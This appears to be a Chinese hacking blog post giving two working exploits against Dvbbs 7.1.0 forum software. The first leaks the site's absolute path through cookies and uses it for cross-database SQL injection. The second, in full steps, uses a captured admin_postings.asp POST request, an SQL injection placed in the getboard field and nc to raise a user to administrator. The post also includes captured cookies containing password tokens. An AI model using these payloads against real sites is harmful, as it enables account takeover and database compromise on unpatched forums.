ＧＯＧＯ BLOG

厂商名字：动网先锋论坛
厂商地址：http://www.dvbbs.net/
漏洞程序：Dvbbs 7.1.0
漏洞描述:
Dvbbs 7.1.0 的Cookie存在泄露站点的绝对路径的漏洞，攻击者可以配合其它技术，实现SQL跨库查询等。
漏洞利用例子:
一、泄露绝对漏洞测试:
对官方的测试站点:bbs.dvbbs.net
上传一张图，代码如下:
GIF89a
<script>alert(document.cookie)</script>
抓包得到cookie如下
Cookie: ASPSESSIONIDSSDSCBQD=NHANOBNCAPCPAMCFMAGDIJCB; dwebdvbbs7%2E1%2E0=UserID=617054&usercookies=1&userclass=%D0%C2%CA%D6%C9%CF%C2%B7&username=linzibct&password=t8ob621664s5v6HL&userhidden=2&StatUserID=2189992004; Dvbbs=
分析cookie可以得到站点的绝对路径如下:
d:\\web\\dvbbs7为论谈的绝对路径
二、攻击延伸:
www.host.com
主程序存在sql注入漏洞，但是找不到表名和字段名。
注入点假设:
www.host.com\\linzi.asp?fuck=you
论谈为dvbbs 7.1.0 ，数据库为data\\\\dvbbs.asp，做了防下载处理.
利用上面的动网暴路径，抓包得到绝对路径为 d:\\www\\dvbbs\\data\\dvbbs.asp
实现跨库查询如下:
www.host.com\\linzi.asp?fuck=you and (select count(*) from dv_admin in "d:\\www\\dvbbs\\data\\dvbbs.asp")
官方补丁:
尚无
再次让动网下地狱(DVBBS最新漏洞 6月17日)

首先找一个没有固顶帖子的版面，自己找找去。一个论坛总不可能哪个版块都有固顶吧？点进去看看有没有固定帖子什么的，我是自己架设的平台做测试的。当然要"符合"漏洞条件了。以前台管理员的身份登陆，也不一定要用前台管理员进去，一个斑竹就行，能固顶帖子就行了，然后随便发个帖子。然后点下设置固顶如图

按正常的方式固顶，如图

到这里我们先暂停，打开WSE抓包工具准备抓取提交的post信息，打开了之后点下

确认操作。现在看看WSE抓到些什么东西了，如图

截取到了post提交信息，复制下来，内容如下：
POST /sql/admin_postings.asp?action=istop HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,

application/x-shockwave-flash, */*
Referer:
http://192.168.1.254/sql/admin_postings.asp?action=istop
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2;

TencentTraveler ; .NET CLR 1.1.4322)
Host: 192.168.1.254
Content-Length: 133
Connection: Keep-Alive
Cache-Control: no-cache
Cookie:

192%2E168%2E1%2E254%2Fsql%2F=UserID=1&usercookies=0&password=9pb621664s

5w7IL7&userhidden=2&userclass=%B9%DC%C0%ED%D4%B1&username=admin&StatUse

rID=1929167667; ASPSESSIONIDCATQTATT=JJGHMOMDLJJAAFHAGMLGOMIL;

ASPSESSIONIDACTTRATS=NMLHLBBAPMOIEGAIBMBFOIMH; Dvbbs=; upNum=0
istopaction=1&boardID=1&ID=1&title=&content=a&doWealth=0&dousercp=0&dou

serep=0&msg=&ismsg=&getboard=1&submit=%C8%B7%C8%CF%B2%D9%D7%F7
现在我们做什么呢？把getboard改成1,1);update [dv_user] set usergroupid=1

where userid=2;-- 不过我们得先转下unicode编码，用encoder.exe转一下，转

换结果如下%31%2C%31%29%3B%75%70%64%61%74%65%20%5B%64%76%5F%75%73%65%72%

5D%20%73%65%74%20%75%73%65%72%67%72%6F%75%70%69%64%3D%31%20%77%68%65%72

%65%20%75%73%65%72%69%64%3D%32%3B%2D%2D%20
把那个getboard=1把这个1换为注射语句就行了。这条语句的意思是将userid值为

2的用户提到管理员组，不过只是前台管理员哦。然后算一下增加了多少个字符修

改下Content-Length的值，我也懒得去数就改成250吧。修改完之后就用NC提交，

如图.

意思是将a.txt的内容用nc提交上去然后将返回的信息保存在1.htm里面.
接着打开我们输出的1.htm看看，如图

语法错误？知道是为什么吗？前面我说过了，Content-Length的长度我没数，语

句只执行到1,1);update [dv_user] set usergroupid=1 where user这里，语句

都没执行完，能正确吗？不过不要紧，我们把长度多加几个数就改成278吧然后再

次提交，然后查看1.htm的输出结果，如图

看到没有？操作成功。成功执行了我们的注入语句。我们看看userid=2的用户是

否成为管理员了,userid=2对应的用户名是：619054，为了省事，我就直接在后台

查看下这个用户的权限是否为管理员了，如图

呵呵，真的提升为管理员了，这个漏洞不光可以将用户从普通权限提升为管

理员，而且还可以直接更改后台管理员的密码，这够严重的吧？动网官方
论坛
到现在都还没出补丁。真够郁闷的

Trackback: http://tb.donews.net/TrackBack.aspx?PostId=573042